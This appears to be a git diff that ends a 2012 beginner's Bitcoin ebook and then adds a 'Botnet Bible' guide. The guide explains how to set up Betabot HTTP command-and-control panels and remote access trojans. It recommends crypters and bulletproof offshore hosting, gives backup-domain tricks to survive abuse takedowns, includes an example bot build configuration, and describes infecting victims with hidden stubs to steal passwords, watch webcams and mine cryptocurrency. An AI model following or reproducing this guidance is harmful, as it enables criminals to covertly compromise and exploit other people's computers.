this in +the authentication process to follow. I named mine, 2012-09-23-Bitcoin-OTC. +Now copy the address and use the following command to authenticate: +;;bcregister 1CXnFLTUc1Z15uvhune6P1VtjcXnrsbzq +You will receive a message stating: + Request successful for user , hostmask !~@unaffiliated/. Your challenge string is: freenode:#bitcoin-otc: +Go to your wallet application and select the “Receive Coins” button. +Select the address you just created and press the “Sign Message” button at the bottom of the +screen. +Now a sign message screen will appear: + +Copy just the challenge string into the window in the area marked 1 which will look like this: +freenode:#bitcoin- +otc:2b5195d2442cbfc302a0b2f6d7b856cd04ecc0435d0e306827b94e9c +You must use the one provided in order for this to work for you. Then press the “Sign +Message” button. Then a message will appear in the window labeled 3. To copy this out, press +the “Copy to Clipboard” button. +Now in the IRC Client, issue the following command to gribble: +;;bcverify random-looking-gibberish-that-is-your-signed-message- +goes-here= +If the process worked, then you are authenticated with this nick. If it doesn’t work, review the +instructions here for more information: +http://wiki.bitcoin-otc.com/wiki/Bitcoin_address_authentication +The Bitcoin-OTC wiki has a lot more details about how to use the service. You can find the wiki +here: +http://wiki.bitcoin-otc.com/wiki/Main_Page +There is an important note about trading on the OTC that I extracted from the wiki: +“There are no automatic systems set up to match buyers and sellers. The entire system is OTC, +if you see a bid/ask you like, contact the counterparty directly on channel or in private message +to set up the transaction. Issues to discuss may be: who bears the transaction fees? Who pays +first? What escrow agent do we use that is mutually trusted? Remember, this is a direct +negotiated transaction - so every detail is negotiable.” (Anonymous, Using bitcoin-otc, 2012) + +More Information +More information about Bitcoin-OTC (Over The Counter) can be found here: +http://wiki.bitcoin-otc.com/wiki/Using_bitcoin-otc +You can see the list of current orders on the BTC-OTC here: +http://bitcoin-otc.com/vieworderbook.php +For a more complete guide to IRC: +http://en.wikipedia.org/wiki/Internet_Relay_Chat +List of IRC Commands: +http://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands + +Bitcoins in Action +So now you know about BTC. You have a wallet and probably funded your account. You know +that the value of the BTC is based on the fact that there is liquidity through the markets such +as MtGox. However, the supply and demand is driven by the fact that people can use the BTC +for something real. As long as there is something that people can use the BTC for, there will be +a market. For the naysayers who tell you BTC are not backed by anything, I would tell you that +as long as they can be liquidated to USD or other currencies and as long as BTC can buy you +something useful, there will be a market for them and an associated value. This value will be +driven by the number of people buying up BTC versus the number of people selling BTC. +Staying Informed +So if you are going to join the market, you will want to stay informed. There are many blogs +out there. Here are a few good online resources: +· http://bitcoin.alltop.com/ +· https://twitter.com/bitcoinnews +· http://www.btcnn.com/ +· http://www.bitcoinblogger.com/ +· http://www.thebitcointrader.com/ +· http://www.bitcoinnews.com/ +A current list can be found on the wiki: https://en.bitcoin.it/wiki/Category:Blogs + +Where to Spend +So let’s investigate some of the things that you can buy with BTC. I’m not going to go into much +detail about any one item. I will provide links below and you can investigate for yourself. I am +not personally endorsing any of the places here. I’m just trying to provide a list to kick start +your enjoyment. My goal is to demonstrate that there is a huge marketplace out there. + +Equity Trading +These stock floors are not regulated like traditional trading, but some good deals can be +found. Just be careful who you do business with. +GLBSE: https://glbse.com/ +BitFloor: https://bitfloor.com/ +At the time of this writing, GLBSE had closed due to the lack of regulation. According to an +article given in Bitcoin Magazine, the goal is to open back up in a regulated manner. If they can +pull this off, this would be something significant. As a user, you should be careful in this +space. There can be a lot of scams. +The wiki site maintains all sorts of training sites (This is a must see page.): +https://en.bitcoin.it/wiki/Trade +You can also trade in the following: +· Precious metal +· Gift/Debit card +· Currencies +· Local In Hand Exchanges + +Merchants that Accept Bitcoins +There are a number of places that you can go to make purchases with Bitcoins directly. +There are a couple of places that you can visit in order to find where you can spend the +Bitcoins. One of the sites is: https://www.spendbitcoins.com/places/ +The wiki page previously mentioned, https://en.bitcoin.it/wiki/Trade, also lists systems you +need in order to enhance your ability to accept Bitcoins: +· Bitcoin eWallets +· Payment systems +· Escrow +· Mobile service +There is a list of VPN Services so that you can maintain anonymous connectivity from areas that +might impede on your right to do something on the internet. +There is a list of internet related services that you can buy that accept BTC. (##) is the number +currently listed. +· Creative Design Services (15 ) +· Wed Design Services(50+) +· Art Design Services(6) +· Web hosting(36) +· Dedicated/Virtual Servers(20+) +· Domain Name Hosting(16) +· Email(2) +· VoIP/SMS(13) +· Security Services(7) +· Mobile App Development(3) +· Productivity(1) +· Other(13) +· Search Engines(1) +· Cloud Providers(7) +· Software(5) +· Education Related(13) +· Gambling(30+) +· Games(20+) +· Graphic Design(5) +· File Sharing(8) +· Music(20+) +· Virtual Art(2) +· Digital Downloads(6) +· Entertainment Books/Magazines(8) +· Social Media(2) + +· Cyber Begging(1) +· Internet Marketing(1) +So let’s say you are not interested in internet related services. You can go shopping for just +about anything. I had originally planned to include the list from the wiki site in this book; +however, it consumed 25 pages. I realized it would be better to direct you to the wiki. This is a +valuable resource I highly recommend that you visit: +http://en.bitcoin.it/wiki/Trade + +Earning Bitcoins +So now you’re excited about everything you can do. However, you don’t want to pay the fees +associated with moving currency into the system. You would rather offer services. If you have +a service, I’m sure you can find a service out there that can help you get started. You certainly +can start a business and make it big in the Bitcoin world. It’s beyond the scope of this book to +tell you how to do that. With the number of services available, I think you can find someone +that can help you. When you figure it out, you could write an eBook to tell others how to do +so. I have not seen one available yet. +If you like eBay and Craigslist, check out the marketplaces if you have something to sell: +Marketplaces +· The Bitcoin Marketplace - Bitcoins classified site and marketplace. Buy and Sell +anything with Bitcoins. +· Bitcoin Harbor - Users can buy and sell for Bitcoins -- out of business. +· Bitmit Secure Bitcoin marketplace. Sell and buy goods for Bitcoin. Worldwide! +· MokiMarket The ebay/craigslist of Bitcoins! +· Bitcoin shopping Shop with your Bitcoins - Worldwide shipping +Auction sites +· CentBiz.com - One of the oldest Penny and Cent Auction online, BitCoins Accepted for +Payment. Available for Portugal, Ireland and UK. 0,25 euro/pound per Bid. +· Penny Auctions - Bartering marketplace where users can purchase credits to bid on +items, or earn credits by auctioning off goods or services as penny auctions for free. Bitcoin +is accepted as payment. +· Bidding Pond (info) +· Bidnapper eBay sniper - Places bids on eBay and other auction sites in the final +seconds, called sniping. +· Bitmarket (info) +· Bitmit - BitCoin auction house & shopping portal (English & German) +· goSnipe eBay Sniper - Place your bid in the final seconds of an eBay auction. Load your +account with Bitcoins. +· Myibidder Auction bid Sniper for eBay - Auction bid Sniper for eBay, bid on last +seconds automatically. The Windows client application can be purchased with Bitcoins. +· HASTUschon? (info) A German auction site. +· BitBid Bitcoin Auction House. + +Mining +The big service out there is the mining service. All I’m going to do here is provide you with +some links as to how to get started mining. This is the only way to get BTC for essentially +nothing. You provide the hardware and the electricity to run the equipment, and you get paid. +As long as the electricity costs less than the BTC you are making, you turn a profit. +Beginners guide to mining: http://startbitcoin.com/ +Mining Guide: http://www.weusecoins.com/mining-guide.php +Pooled Mining: https://en.bitcoin.it/wiki/Pooled_mining +Mining Hardware: https://en.bitcoin.it/wiki/Mining_hardware_comparison + +Bitcoin Underbelly +I want to keep this book positive and promote the good about the Bitcoin infrastructure. There +is however an underbelly. There have been some high profile cases in just the past month or +so that have shed a bad light on the Bitcoins. That said, Bitcoins are not the problem, the +criminals are. +One article recently seems to indicate that the BTC transactions are not as anonymous as some +have thought or as easy to hide. This is in connection with the BitFloor heist, where $250,000 +USD worth of BTC were stolen from various users. + +Hacker Steals Bitcoins +BitFloor breached, hacker makes off with $250,000 in Bitcoins: +http://www.techspot.com/news/50043-bitfloor-breached-hacker-makes-off-with-250000-in- +bitcoins.html +Bitcoin thieves yet to spend stolen hoard: +http://www.bbc.com/news/technology-19633980 +This article indicates that the transactions of the stolen keys are being watched. This is +interesting. + +Ransom in Bitcoins +In a separate case, US presidential candidate Mitt Romney’s tax returns were stolen and the +hacker wanted to be paid in $1,000,000 USD payable to one of two BTC addresses. One would +release the tax returns, and the other would keep the tax returns hidden. +http://venturebeat.com/2012/09/05/romney-tax-returns-hacked/ + +Gambling with Bitcoins +A little over a year ago, a poker web site opened up SealsWithClubs which allowed people to +buy in with BTC. I place this in the underbelly because in the USA, it is illegal to gamble online. +For those of you in countries where gambling online is legal, this entry may not seem so +negative. Using BTC reduces the likelihood that offenders will be caught. +http://www.pokerscout.com/SiteDetail.aspx?site=SealswithClubs&ab=1337 + +Buying Drugs with Bitcoins +Silk Road is selling drugs online in exchange for BTC: +http://www.forbes.com/sites/andygreenberg/2012/08/06/black-market-drug-site-silk-road- +booming-22-million-in-annual-mostly-illegal-sales/ +I think this one speaks for itself. + +Appendix A: Other Resources +Now that you know what a Bitcoin is, how to set up your own wallet, fund your account, earn, +spend and transfer BTC to government currency, you’re all set. There should be no other +information you need. J Not so. There is so much more out there than the scope of this +book. +The first place I recommend you take a look at is the wiki site: +https://en.bitcoin.it/wiki/Main_Page +Look at the Topic Central: +You can see the topics cover much more than this eBook did. +For in-depth technical information about the blocks: +http://blockchain.info/ +For a look at charts that show the market trends as a whole: +http://blockchain.info/charts +Currency Exchange market watch can be found at: +http://bitcoinwatch.com/ +If you are going to get into mining, before you buy anything make sure you consider the +products at Butterfly Labs: +http://www.butterflylabs.com/products/ +Their new super computer line of mining rigs is the top of the line and 50 times faster for the +price than any of their competitors. We only touched on mining. Make sure you do your +homework and plan first. If your electricity costs are too high, you will not be turning a profit. + +Besides the wiki, another great place to get information about the Bitcoin world is through +Bitcoin Magazine. This is an online publication with print versions available in many Barnes & +Noble Book stores. +http://bitcoinmagazine.net +At the bottom of the list of articles, there is a page selector so that you can scroll to more +articles. Check the last page, which lists some of the first stories written about wallets which +are good. +An Introduction to Terminology: +Part 1 http://bitcoinmagazine.net/introduction-to-bitcoin-terminology +Part 2 http://bitcoinmagazine.net/introduction-to-bitcoin-terminology-part-ii +I highly recommend that you visit the magazine. I’m a subscriber and enjoy the articles. + +Appendix B: Bibliography +anonymous. (2012, 9). Bitcoin. Retrieved 9 21, 2012, from Bitcoin wiki: +https://en.bitcoin.it/wiki/Main_Page +Anonymous. (2012). Browser-based wallet. Retrieved 09 18, 2012, from Bitcoin Wiki: +https://en.bitcoin.it/wiki/Browser-based_wallet +Anonymous. (2012, 09). Using bitcoin-otc. Retrieved 09 23, 2012, from Bitcoin-OTC Wiki: +http://wiki.bitcoin-otc.com/wiki/Using_bitcoin-otc#Trading +Kirk, J. (2012, Sep 4). BitCoin exchange loses $250,0000 after unencrypted keys stolen. Retrieved +Sep 18, 2012, from PCWorld: +http://www.pcworld.com/article/261894/bitcoin_exchange_loses_2500000_after_unencrypted_keys_stolen.html diff --git a/Botnet Guide Complete_pdf.md b/Botnet Guide Complete_pdf.md new file mode 100644 index 0000000..94cfb5e --- /dev/null +++ b/Botnet Guide Complete_pdf.md @@ -0,0 +1,1918 @@ +# Botnet Guide Complete + + +--- + +BOTNET BIBLE V.3 +Introduction: +Botnet can be definied as the network of infected computers. +A botnet is a collection of internet-connected devices, which may +include PCs, servers, mobile devices and internet of things devices +that are infected and controlled by a common type of software called +malware. Users are often unaware of a botnet infecting their system. +In basic language bots are program which are automated or you can +say robotic. In simple context bots refer to those computers which can +be controlled from the external source which may be programmed in +them. +Now the attacker gains access to the computers by virus or any +miscellaneous code. Most of the times computer are operating +normally, so the malicious operations stay hidden to the user. + +Infected devices are controlled remotely by threat actors, often +cybercriminals, and are used for specific functions. Botnets are +commonly used to: +- generate malicious traffic for distributed denial-of-service attacks +- cryptocurrency minning +- surveillance +- stealing data +- many other things +Type of botnets: +- IOT(Internet of things) +The Internet of things (IoT) is the network of physical devices, +vehicles, home appliances and other items embedded with +electronics, software, sensors, actuators, and network +connectivity which enables these objects to connect and +exchange data. +Mirai is a malware that turns networked devices running Linux +into remotely controlled "bots" that can be used as part of a +botnet in large-scale network attacks. It primarily targets online +consumer devices such as IP cameras and home routers. The +Mirai botnet was first found in August 2016. +- IRC (Internet Relay Chat) +Internet Relay Chat (IRC) is an application layer protocol that +facilitates communication in the form of text. The chat process +works on a client/server networking model and bots are +controlled by IRC Server. +- RAT (Remote Access Trojan) +RAT is a specific type of malware that controls a system via a +remote network connection as if by physical access. While +desktop sharing and remote administration have many legal uses, +RAT is usually associated with criminal or malicious activity. A +RAT is typically installed without the victim's knowledge. + +- HTTP (Hypertext Transfer Protocol ) +HTTP is an application protocol for distributed, collaborative, +and hypermedia information systems.[1] HTTP is the +foundation of data communication for the World Wide Web and +bots are controlled trought webpanel. +Botnet Bible teaches you how to setup RATS and HTTP botnets. +RAT Requirements: +– Remote Administration Tool, you may use free, cracked or paid +RAT. +Free: +– Quasar +– Babylon +– Darktrack +– Njrat +Cracked: +– Nanocore +Paid: +– Netwire +– Imminent Monitor +– Orcus +– Remcos +– Crypter +Crypters are legal encrypting tools. If used correctly, and with +proper permission, then you have nothing to worry about. On the +other hand, if you are using crypters to encrypt malware with the +sole purpose of infecting computers that are not yours you are +committing a crime. +When it comes to crypters it's a whole series of choices. I will +explain you how to use crypter in a moment. + +– (DNS) The Domain Name System is a hierarchical decentralized +naming system for computers, services, or other resources +connected to the Internet or a private network. It associates +various information with domain names assigned to each of the +participating entities. Most prominently, it translates more +readily memorized domain names to the numerical IP addresses +needed for locating and identifying computer services and +devices with the underlying network protocols. By providing a +worldwide, distributed directory service, the Domain Name +System is an essential component of the functionality on the +Internet, that has been in use since 1985. +– VPN Virtual private network extends a private network across a +public network, and enables users to send and receive data across +shared or public networks as if their computing devices were +directly connected to the private network. Applications running +across the VPN may therefore benefit from the functionality, +security, and management of the private network. +HTTP C&C Requirements: +– VPS (Virtual Private server) is a virtual machine sold as a +service by an 3yInternet hosting service. +– Domain Name +– Crypter +– Botnet webpanel files, builder or build connected to your +domain/server ip + +Offshore servers and bulletproof domains: +Choosing the right hosting provider and domain registrar may +save you a lot of troubles in future. For small botnets (500-5000 +bots) you may only need to buy Virtual Private Server located in +one of those countries: +– Panama +– Costa Rica +– Berize +– Guatemala +– Russia +few examples: +– panamaserver.com +– offshoreracks.com +– ccihosting.com +– http://www.crservers.com/virtual-private-servers.html +– https://www.vps9.net/russia-vps +– https://www.racklodge.com +– https://www.scopehosts.com/openvz-vps/russia-vps +– www.superbithost.com +and russian or chaina registrar, few examples: +– r01.ru +– nic.ru +– tonic.tu +– openleaf.net.ru +– shinjiru.com +– bpw.sc +– elkupi.com + +Depends on your actions(how you spread your executable file, +how you use your botnet(ddosing, minning, herding bots, +CPA,CEO, etc.) your server or domain may be listed on +spamhaus, it means your domain/server/customer account may +be suspended permanently. In this case, when you create your +botnet u use at least two back up domains, so if your main +domain will be suspended, your bots will connect to back up +domain. If your server get suspended you just need to reinstall +your panel on another server. From my experience some +providers ignore first abuse but if spamhaus will keep sending +reports, you will get suspended. If u want to avoid this problem, +usually you need to buy good dedicated server in offshore +location, but its much expensive, also you may buy fast flux +system, its a proxy system, it hide your real server IP. +So if u want to setup HTTP botnet buy domain and server. +This is example how to buy panamaserver.com + +Once you purchase server, check your email, you should get SSH, +FTP, control panel details. SSH access is used to control your OS and +perform all commands, FTP is used to transfer files between you and +your VPS. Control panel is used to reboot, reinstall server, statistics +(i.e.bandwidth). +Download putty +https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and +login to SSH. +Download WINSCP: +https://winscp.net/eng/download.php and login to FTP +If your VPS is based on centos 7, skip centos 6 part. +Centos 6: +Login to SSH root using putty +1. First of all update your server and install wget and vim. Sometimes +you may be asked few times for confirmation, just press Y and +ENTER: +Code: +sudo yum update +sudo yum install wget +sudo yum install vim +2. Install apache and run it: +Code: +sudo yum install httpd +sudo service httpd start +3. Install PHP. Sometimes newest version of PHP is required, in that +case we will install php and upgrade it using REMI and EPEL +repositories: + +- Install PHP: +Code: +sudo yum install php +– Install the Remi and EPEL RPM repositories: +Code: +wget https://dl.fedoraproject.org/pub/epel/epel-release-latest- +6.noarch.rpm && rpm -Uvh epel-release-latest-6.noarch.rpm +wget http://rpms.famillecollet.com/enterprise/remi-release-6.rpm && +rpm -Uvh remi-release-6*.rpm +– You need to enable the REMI repository globally. I will use VIM +- free text editor. Quick guide: if you press INSERT you will be +able to edit document and if you press ESC you will be in +command mode. +Type the following command: +Code: +vim /etc/yum.repos.d/remi.repo +Press INSTERT and under the section [remi] and [remi-php56] change +the following line from 0 to 1: enabled=0 +Now press ESC and type the following command: +Code: +:wq +Now you can upgrade your php: +Code: +sudo yum -y upgrade php* + +4. Install MYSQL server. We will use official REMI repositories. +Install and activate the REMI and EPEL RPM Repositories +If you have not done so already, install and activate the REMI and +EPEL repositories; +Code: +wget https://dl.fedoraproject.org/pub/epel/epel-release-latest- +6.noarch.rpm && rpm -Uvh epel-release-latest-6.noarch.rpm +wget http://rpms.famillecollet.com/enterprise/remi-release-6.rpm && +rpm -Uvh remi-release-6*.rpm +Code: +sudo yum install mysql mysql-server +- now run mysql: +Code: +sudo service mysqld start +- using this commands you can upgrade and check what version of +mysql you use: +Code: +yum -y update mysql* +rpm -qa | grep mysql +5. Install additional libraries. Few botnets require addidtional php +libraries. For example Zyklon HTTP require php-gd library for +captcha. We will install few standard libraries: +Code: +sudo yum install php-mysql php-pdo php-common php-cli php-gd + +6. Now we need to install Ioncube Loader. Download it from +https://www.ioncube.com/loaders.php I use centos 6 64bit so i +choosed linux 64 bit. You can see a lot of files in archive, which +Ioncube loader is the right one ? Depends on your PHP version. Type +the following command: +Code: +php -v +In that case i have installed PHP 5.6 so i copy the following file: +ioncube_loader_lin_5.6 to my server. You need to copy it to: +/usr/lib64/php/modules/ioncube_loader_lin_5.6.so +Do it in ftp client if u want. Now you need to edit php.ini file. Its +located in /etc/php.ini We will use vim again: +Code: +vim /etc/php.ini +Press INSERT and add the following line at the top of the file. This is +just path to Ioncube loader. Version of Ioncube loader must match +with PHP version. +Code: +zend_extension = /usr/lib64/php/modules/ioncube_loader_lin_5.6.so +Now restart apache&mysql and check if its installed correctly: +Code: +service httpd restart +service mysqld restart +php -v +7. Dealing with mysql: +- Run mysql installation script: +Code: +mysql_secure_installation + +You will be able to setup new root password to your mysql. To other +questions just answer yes. +- Now log in to mysql: +Code: +mysql -u root -p +- Create new database: +Code: +create database NameOfYourDatabase; +- Create new user with privileges and refresh it: +Code: +CREATE USER 'NameOfYourUser'@'localhost' IDENTIFIED BY +'PasswordForYourUser'; +GRANT ALL PRIVILEGES ON NameOfYourDatabase . * TO +'NameOfYourUser'@'localhost'; +FLUSH PRIVILEGES; +Now direct your browser to http://192.168.0.100, and you should see +the Apache2 placeholder page: + +CENTOS 7: +Login to SSH root using putty +update your server: +sudo yum update +sudo yum -y update +1 Installing MySQL / MariaDB +MariaDB is a MySQL fork of the original MySQL developer Monty +Widenius. MariaDB is compatible with MySQL and I've chosen to use +MariaDB here instead of MySQL. To install MySQL, we do install +MariaDB like this: +yum -y install mariadb-server mariadb +Then we create the system startup links for MySQL (so that MySQL +starts automatically whenever the system boots) and start the MySQL +server: +systemctl start mariadb.service +systemctl enable mariadb.service +Set passwords for the MySQL root account: +mysql_secure_installation +[root@server1~]# mysql_secure_installation +/usr/bin/mysql_secure_installation: line 379: find_mysql_client: command not found +NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MariaDB +SERVERS IN PRODUCTION USE! PLEASE READ EACH STEP CAREFULLY! +In order to log into MariaDB to secure it, we'll need the current +password for the root user. If you've just installed MariaDB, and +you haven't set the root password yet, the password will be blank, +so you should just press enter here. +Enter current password for root (enter for none): <--ENTER +OK, successfully used password, moving on... +Setting the root password ensures that nobody can log into the MariaDB +root user without the proper authorisation. +Set root password? [Y/n] +New password: <--yourmariadbpassword +Re-enter new password: <--yourmariadbpassword +Password updated successfully! +Reloading privilege tables.. +... Success! + +By default, a MariaDB installation has an anonymous user, allowing anyone +to log into MariaDB without having to have a user account created for +them. This is intended only for testing, and to make the installation +go a bit smoother. You should remove them before moving into a +production environment. +Remove anonymous users? [Y/n]<--ENTER +... Success! +Normally, root should only be allowed to connect from 'localhost'. This +ensures that someone cannot guess at the root password from the network. +Disallow root login remotely? [Y/n] <--ENTER +... Success! +By default, MariaDB comes with a database named 'test' that anyone can +access. This is also intended only for testing, and should be removed +before moving into a production environment. +Remove test database and access to it? [Y/n]<--ENTER +- Dropping test database... +... Success! +- Removing privileges on test database... +... Success! +Reloading the privilege tables will ensure that all changes made so far +will take effect immediately. +Reload privilege tables now? [Y/n]<--ENTER +... Success! +Cleaning up... +All done! If you've completed all of the above steps, your MariaDB +installation should now be secure. +Thanks for using MariaDB! +[root@server1~]# +2 Installing Apache2 +CentOS 7 ships with apache 2.4. Apache2 is directly available as a +CentOS 7.0 package, therefore we can install it like this: +yum -y install httpd +[root@server1~]# yum install httpd +Loaded plugins: fastestmirror, langpacks +Loading mirror speeds from cached hostfile +* base: ftp.plusline.de +* extras: mirror.23media.de +* updates: mirror.23media.de +Package httpd-2.4.6-17.el7.centos.1.x86_64 already installed and latest version +Nothing to do +[root@server1~]# + +By default apache will be installed, if-not then please install it as +shown above +Now configure your system to start Apache at boot time... +systemctl start httpd.service +systemctl enable httpd.service +In CentOS 7.0 uses Firewall-cmd, so I will customize it to allow +external access to port 80 (http) and 443 (https). +firewall-cmd --permanent --zone=public --add-service=http +firewall-cmd --permanent --zone=public --add-service=https +firewall-cmd --reload +Now direct your browser to http://192.168.0.100, and you should see +the Apache2 placeholder page: + +- Now log in to mysql: +Code: +mysql -u root -p +- Create new database: +Code: +create database NameOfYourDatabase; +- Create new user with privileges and refresh it: +Code: +CREATE USER 'NameOfYourUser'@'localhost' IDENTIFIED BY +'PasswordForYourUser'; +GRANT ALL PRIVILEGES ON NameOfYourDatabase . * TO +'NameOfYourUser'@'localhost'; +FLUSH PRIVILEGES; +4. Now we need to install Ioncube Loader. Download it from +https://www.ioncube.com/loaders.php I use centos 7 64bit so i +choosed linux 64 bit. You can see a lot of files in archive, which +Ioncube loader is the right one ? Depends on your PHP version. +Type the following command: +Code: +php -v +In that case i have installed PHP 5.6 so i copy the following file: +ioncube_loader_lin_5.6 to my server. You need to copy it to: +/usr/lib64/php/modules/ioncube_loader_lin_5.6.so +Do it in ftp client if u want. Now you need to edit php.ini file. Its +located in /etc/php.ini We will use vim again: + +Code: +vim /etc/php.ini +Press INSERT and add the following line at the top of the file. This is +just path to Ioncube loader. Version of Ioncube loader must match +with PHP version. +Code: +zend_extension = /usr/lib64/php/modules/ioncube_loader_lin_5.6.so +Now restart apache&mysql and check if its installed correctly: +Code: +service httpd restart +service mysqld restart +php -v +You should see ioncube loader version. +Setting up domains: +Depends which server/domain you bought, you have two options: – +add A record(contains your VPS IP) to your domain if you purchased +DNS hosting within your domain – add nameservers to your domain if +you purchased DNS zone with your server +For example if you choosed panamaserver and nic.ru domain you can +just add nameservers to your domain, because panamaserver provides +you your name servers: ns1.panamaserver.co and ns2.panamaserver.co +If u dont have nameservers with your vps you need to use A record. + +Adding nameservers in nic.ru: +Pointing your domain to your VPS in panamaserver DNS ZONE: + +Setting up webpanel: +Once you finish server and domain parts, login to FTP and upload +your panel to var/www/ or if u have /html/ directory upload panel to +var/www/html/ +Now go to install.php or setup.php and you should see something like +this: +All other http botnets should have similar setup page. This one +provided is ax example for betabot 1.8 +Untick „Createa database” because you already created one directly in +mysql. + +Fill all fields: +Database name: your database name you have created in mysql. +Database user: your user you have created in mysql. +Database password: password for this user. +Admin username: This will be your login to c&c +Admin password: This will be your password to c&c +Encryption keys: +Usually you create your keys in builder. Before you finish installation, +open betabot builder and you should see something like this: + +Host name: yourdomain.xxx +Gate path: direct directory to logout.php file +Keys: you need to generate keys and copy it to fields in setup.php +In Betabot 1.8 you may add up to 6 domains. So you can buy more +than one domain and add it as a backup. If your main domain will get +suspended, bots will try to connect to second one. +You may use your VPS IP instead of domain name. Here is an +example build log for betabot: +MAIN CONFIG: +Unique Name: Unique_001 +Runkey Name: Google Updater 2.0 +Folder Name: Google Updater 2.0 +Knock Interval: 60 +HOST CONFIG 1: +Host Name: mybbhax.ru +Gate Path: /betabooot/logout.php +Key 1: 5F593BD72BE60275 +Key 2: EDD5E3D55BA65CE4 +HOST CONFIG 2: +Host Name: 200.63.45.72 +Gate Path: /betabooot/logout.php +Key 1: 5F593BD72BE60275 +Key 2: EDD5E3D55BA65CE4 +In this example: +my domain is: mybbhax.ru +Panel is installed in /betabooot/ directory, so gate path is: +Gate Path: /betabooot/logout.php +If you installed panel without additional directory, your gate should +be: +Gate Path: /logout.php + +Now you need to set permissions to your panel files. You can do it +trought FTP and SSH. +In your FTP client, right click on directory you have used to store +panel files, and click properties. Now under permission tab just add all +permissions to all groups, in other words its called CHMOD 777. +In case its not working for you, you may do it trought SSH. +Login to SSH and use the following command: +sudo chmod -R 777 var/www/dir +/dir/ is a place where i stored my panel files. +In case this command is not working, use this one and try to set +permissions again: +sudo setenforce 0 +If you want to have geo IP locations in your panel you need to load +geoip.csv file into your database. Here is an example: + +In this example +my database name is: estr +geoIP file is stored in /var/www/html/geiop.csv +Command to load geopip file to your DB: +LOAD DATA LOCAL INFILE '/var/www/html/geoip.csv' INTO +TABLE estr.geoip FIELDS TERMINATED BY ',' ENCLOSED BY '”' +LINES TERMINATED BY '\n'; +Now you should be able to see geo ip map. +Now you can click build in builder and install in setup page and if u +did everything correctly your botnet is ready ! +Betabot builder gives you output with .pe32 extension, its just to +prevent miss execution after building. You can just delete this +extension and leave it as output.exe for example and run it. +After 1 minute you should see 1 client in your panel. +Another way to test your binary file is here: +https://hackforums.net/showthread.php?tid=5776978 +Just submit your file on the follow site and you should see 1 client in +your panel. + +RAT SETUP: +What are Remote Administration Tools? +A Remote Administration Tool (RAT for short) can be used for +malicious purposes or legal purposes, some illegal purposes are +controlling PC's, stealing victims data, deleting files. You can infect +someone by sending them the stub you have created in your RAT. +How do they work? +The RAT is run on your computer, then you can create a stub file to infect +clients. The stub will work in the background and will be hidden for the +client. You can monitor the clients activity, manage files, install software, +view passwords, turning on webcams and much more. +Do I have to portforward? +Yes! This is the most important part of setting up your rat. +Legal and Illegal uses of a RAT + +A RAT can be used for illegal and legal purposes. Some legal purposes are +using it to monitor your businesses computers, recover passwords that are +forgotten, transfer files and many more. Some people use RATs for illegal +purposes to steal accounts, bank or credit card information, or even mine +cryptocurrency on the clients computer. +I do not condone using RATs for illegal purposes, if you are using it for +legal purposes feel free. +Things you NEED to know about a RAT +– a RAT is legal software and is not meant to be used in any +malicious way. If you do use it in a malicious way you are at +constant risk of losing your license and going to jail. +– Your clients will not dissapear after you or them have restarted +their computer. (providing you used startup which I explain later +on in the guide) +– Most PAID RATs are HWID locked meaning you can only use 1 +computer per license. Don't try and share it with your friends. +Orcus is an exception and allows 3 per license. +– You can have user or administrator permissions on your clients, +changing the amount of things you can do drastically. +– Unless you are using a PHP RAT you will ALWAYS require port +forwarding. +– Certain RATs have dependencies while others don't. Explained +more in-depth later on. +Port forwarding with your router: +Port forwarding, most of you guys usually go DEAR GOD HELP ME +when you are confronted with this. WELL NO MORE! After this guide +everyone should be able to port forward with or without VPN. Why do you +need to port forward? You need an open port for outside connections (your +client) to connect to your internet. Well, let's get into the without VPN part +first. + +Understand the following BEFORE going onto this guide. +- Googling your router and how to port forward on it will NEVER hurt. +They give information that is impossible for me to know in advance such +as what you need to click on etc. +- There's a couple different router setups. I'm going to cover the ones I +know which is a total of 3 ways. It's up to you to figure out which one of +these is closes to yours. +- Even when you THINK your port forwarding is done, keep on reading +and don't miss a SINGLE step! +Possible setup no. 1 - Regular portforwarding +This is the easiest to do and also the most common among routers. +Go over to your router page found by typing in your default gateway into +your browser. +How do you find your default gateway? Open your cmd.exe and type in +ipconfig which will show you your default gateway 2 lines below your +IPv4. +In the picture below my default gateway is 192.168.0.1. +Now that you are on your router page you will want to find the port +forwarding tab. +Usually this can be found under the advanced tab and is straight up called +'port forwarding'. +Once you've found it, click on it and you should see something similar to +this. + +Now don't get scared by the different language shown here. Let me quickly +explain in order what those words mean. What you're looking at is Internal +IP-adress / Begin port / End port / Protocol / Activated. +Your internal IP adress is your IPv4 shown above your default gateway. +Your begin port and end port should be the same and is the port you are +trying to open. Protocol is either UDP or TCP or BOTH. You will want to +choose BOTH! +Now that you know all this, this is what it should look like filled in. (In +this picture I have opened port 30000) +When you filled in yours and it looks like mine (with your IPv4 and +desired port) hit save changes and that concludes port forwarding. Read +the 'testing your port' category on how to PROPERLY test your port. +DON'T TEST IT ON YOUR OWN, GO READ THAT SECTION! + +Port forwarding with VPN +Port forwarding through a VPN is way easier and simplified. +It is also HIGHLY recommended that you use one regardless of your +intentions. Due to it being way simpler I can just make steps instead of +complicated and long explanations. +CrypticVPN +- Connect to the server you wish to use. +- Go to the crypticvpn.com website, log in and navigate to the VPN control +panel and from there to the 'open port' section. +- In port fill in the port you wish to open. (recommend any port between +10k and 60k) +- Internal IP is your IPv4 which should start with 10.8 if you are properly +connected to the VPN. (Keep in mind you have multiple IPv4 make sure +you get the right one!) +- Location will be the server you are currently connected to. +- In the picture below you will see me open port 12521 on the amsterdam +servers. + +– That concludes port forwarding through crypticVPN. Read the +'testing your port' category on how to PROPERLY test your port. +DON'T TEST IT ON YOUR OWN, GO READ THAT SECTION! +TESTING YOUR PORT(In this example i use remcos rat): +- Connect to your VPN if you are using one. If not skip this step. +- Completely disable your firewall! (VERY IMPORTANT) +- Open Remcos. +- Click on 'Local settings' +- Fill in your open port, password (which you will need inside the builder) +and click add. +- Click 'save settings'. +- Once you've done that go to canyouseeme.org fill in the port and if it says +success your port is opened correctly! + +SETTING UP DNS FOR RAT +Why do you need a DNS? Fact is that you don't NEED a DNS. But if you +don't have one and your IP changes all of your clients will be gone. You +don't want that now do you? +Yeah that's what I thought. Now there's 2 free DNS providers and 1 paid +provider that are now accepted on HF. +freenom found at freenom.com (FREE) +L33t DNS https://hackforums.net/showthread.php?tid=5781560 +Freenom - Free DNS +- If you plan on using a VPN connect to it right now. If not skip this step. +- Head over to freenom.com and check for an available domain. 